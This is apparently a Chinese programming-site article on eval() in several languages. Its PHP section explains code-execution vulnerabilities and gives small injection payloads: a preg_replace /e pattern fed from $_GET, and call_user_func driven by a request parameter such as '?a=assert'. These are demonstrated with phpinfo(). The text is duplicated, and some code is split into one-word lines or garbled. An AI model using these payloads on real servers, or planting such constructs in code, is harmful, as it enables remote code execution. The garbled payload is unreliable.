eval函数使用方法(Payload:<? php eval('phpinfo();');?>可否为php代码执行?)
2025-02-11 23:47:12 | 我爱编程网
我爱编程网小编给大家带来了eval函数使用方法(Payload:可否为php代码执行?)相关文章,一起来看一下吧。
Eval函数在JavaScript脚步语言中的使用:新建一网页文件“a.html”,在文件中输入如图所示代码并保存,打开该网页文件使脚本运行,则输入结果如图。
Eval函数在ExcelVBA编程中的使用:进入ExcelVBA编程环境,新建一模块,在模块中输入如图所示内容,点击运行,结果如图所示。
Eval函数在VBScript脚本语言中的使用: 在VB脚本语言中,Eval函数具有两层意思,一是实现计算表达的值,即eval()函数可将字符串转换为代码执行,并返回一个或多个值;二是运行指定的代码。实例如图所示。
Eval函数在PHP代码中的使用:eval() 函数把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码,且必须以分号结尾。如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。实例如图所示。
危险函数执行PHP代码的有:
eval(), assert(), preg_replace(), call_user_func(), call_user_func_array(), create_function(), array_map()等。
1.eval()和assert()函数本身就可动态执行代码,其参数就是PHP代码
payload: <? eval('phpinfo();');?>
2.preg_replace()函数的第一个参数存在e修饰符时,第二个参数和第三个参数可能当作PHP代码被执行
preg_replace漏洞触发有两个前提:
第一个参数需要e标识符,有了它可以执行第二个参数的命令
第一个参数需要在第三个参数中的中有匹配,不然echo会返回第三个参数而不执行命令
//echo preg_replace(‘/test/e’, ‘phpinfo()’, ‘just test’);这样是可以执行命令的
//echo preg_replace(‘/test/e’, ‘phpinfo()’, ‘just tesxt’); 或者echo preg_replace(‘/tesxt/e’, ‘phpinfo()’, ‘just test’); 这两种没有匹配上,所以返回值是第三个参数,不会执行命令
payload:
<?php preg_replace('/
(.∗)
(.∗)
/e','\\1','$_GET['a']);?>
请求1.php?a=[phpinfo()]
3.call_user_func()和array_map()等函数的作用就是调用其他函数,并将第二个参数作为回调函数的参数
payload:
<?php $b='phpinfo()'; call_user_func($_GET['a'],$b);?>
请求1.php?a=assert, 则调用了assert函数
函数把字符串按照
PHP
代码来计算。
该字符串必须是合法的
PHP
代码,且必须以分号结尾。
如果没有在代码字符串中调用
return
语句,则返回
NULL。如果代码中存在解析错误,则
eval()
函数返回
false。
例子:
<?php
$string
=
"beautiful";
$time
=
"winter";
$str
=
'This
is
a
$string
$time
morning!';
echo
$str.
"<br
/>";
eval("\$str
=
\"$str\";");
echo
$str;
?>
输出:
This
is
a
$string
$time
morning!
This
is
a
beautiful
winter
morning! 我爱编程网以上就是我爱编程网小编给大家带来的eval函数使用方法(Payload:可否为php代码执行?),希望能对大家有所帮助。更多相关文章关注我爱编程网:www.52biancheng.com
免责声明:文章内容来自网络,如有侵权请及时联系删除。
本文目录一览:
eval函数使用方法
Eval函数的重要功能是实现对表达式的计算,能够处理表达式的长度在256个字符之内的运算式的计算。下面就来探讨一下Eval函数的具体使用方法。Eval函数在JavaScript脚步语言中的使用:新建一网页文件“a.html”,在文件中输入如图所示代码并保存,打开该网页文件使脚本运行,则输入结果如图。
Eval函数在ExcelVBA编程中的使用:进入ExcelVBA编程环境,新建一模块,在模块中输入如图所示内容,点击运行,结果如图所示。
Eval函数在VBScript脚本语言中的使用: 在VB脚本语言中,Eval函数具有两层意思,一是实现计算表达的值,即eval()函数可将字符串转换为代码执行,并返回一个或多个值;二是运行指定的代码。实例如图所示。
Eval函数在PHP代码中的使用:eval() 函数把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码,且必须以分号结尾。如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。实例如图所示。
Payload:可否为php代码执行?
代码执行漏洞是指应用程序本身过滤不严,攻击者可以通过请求将代码注入到应用中,最终在web服务器上去执行。危险函数执行PHP代码的有:
eval(), assert(), preg_replace(), call_user_func(), call_user_func_array(), create_function(), array_map()等。
1.eval()和assert()函数本身就可动态执行代码,其参数就是PHP代码
payload: <? eval('phpinfo();');?>
2.preg_replace()函数的第一个参数存在e修饰符时,第二个参数和第三个参数可能当作PHP代码被执行
preg_replace漏洞触发有两个前提:
第一个参数需要e标识符,有了它可以执行第二个参数的命令
第一个参数需要在第三个参数中的中有匹配,不然echo会返回第三个参数而不执行命令
//echo preg_replace(‘/test/e’, ‘phpinfo()’, ‘just test’);这样是可以执行命令的
//echo preg_replace(‘/test/e’, ‘phpinfo()’, ‘just tesxt’); 或者echo preg_replace(‘/tesxt/e’, ‘phpinfo()’, ‘just test’); 这两种没有匹配上,所以返回值是第三个参数,不会执行命令
payload:
<?php preg_replace('/
(.∗)
(.∗)
/e','\\1','$_GET['a']);?>
请求1.php?a=[phpinfo()]
3.call_user_func()和array_map()等函数的作用就是调用其他函数,并将第二个参数作为回调函数的参数
payload:
<?php $b='phpinfo()'; call_user_func($_GET['a'],$b);?>
请求1.php?a=assert, 则调用了assert函数
求PHP中eval()函数的使用方法
我爱编程网(https://www.52biancheng.com)小编还为大家带来求PHP中eval()函数的使用方法的相关内容。
eval()函数把字符串按照
PHP
代码来计算。
该字符串必须是合法的
PHP
代码,且必须以分号结尾。
如果没有在代码字符串中调用
return
语句,则返回
NULL。如果代码中存在解析错误,则
eval()
函数返回
false。
例子:
<?php
$string
=
"beautiful";
$time
=
"winter";
$str
=
'This
is
a
$string
$time
morning!';
echo
$str.
"<br
/>";
eval("\$str
=
\"$str\";");
echo
$str;
?>
输出:
This
is
a
$string
$time
morning!
This
is
a
beautiful
winter
morning! 我爱编程网以上就是我爱编程网小编给大家带来的eval函数使用方法(Payload:可否为php代码执行?),希望能对大家有所帮助。更多相关文章关注我爱编程网:www.52biancheng.com
免责声明:文章内容来自网络,如有侵权请及时联系删除。
上一篇:phpinfo函数的作用是什么?
下一篇:php怎么提取小括号里内容
与“eval函数使用方法(Payload:<? php eval('phpinfo();');?>可否为php代码执行?)”相关推荐
栏目推荐
- 用php 自定义一函数,能够输入的整数,反序逐位输出。如输入3456,输 PHP中foreach函数用法?
- PHP strcmp定义和用法 php中统计数组的长度是那个函数?
- 关于如何解决mysqli()没有与之对应mysqli_field_name()问题
- PHP feof提示和注释(FileSystemPHP Filesystem 函数)
- php里面有多条UPDATE怎么优化?
- php和html怎么结合?
- chunk_split语法(SPLIT语言用法)
- php正则提取函数 PHP利用正则表达式截取字符串,preg_match_all()函数
- 使用fnmatch函数在PHP中进行模式匹配操作 php判断某字符串是否符合电子邮件格式的正则表达式
- php程序中,定义一个常量,常量名为什么非要用双引号呢? 例如:define("NAME",10);
- php函数处理排序 sortphp sort函数
- 怎么设置html文字背景颜色
热点图文
-
在线急求 PHP解密(PHP解密 (base64_decode))2025-02-01 20:24:39
-
php获取当前页面url(URL、表单数据、IP等处理类,url表单_PHP教程)2025-02-12 03:21:37
-
PHP文件及运行(适合PHP初学者)(PHP开发常用的4种运行方式)2025-02-10 15:19:48
-
PHP开发中(Array)数组函数大全(100个最常用的PHP函数(记得收藏哦))2025-01-28 17:58:32
-
php 日期加减法问题(php 时间加减)2024-11-22 05:08:01
-
我是php新手,请问swoole怎么解密呢?2024-09-10 08:50:00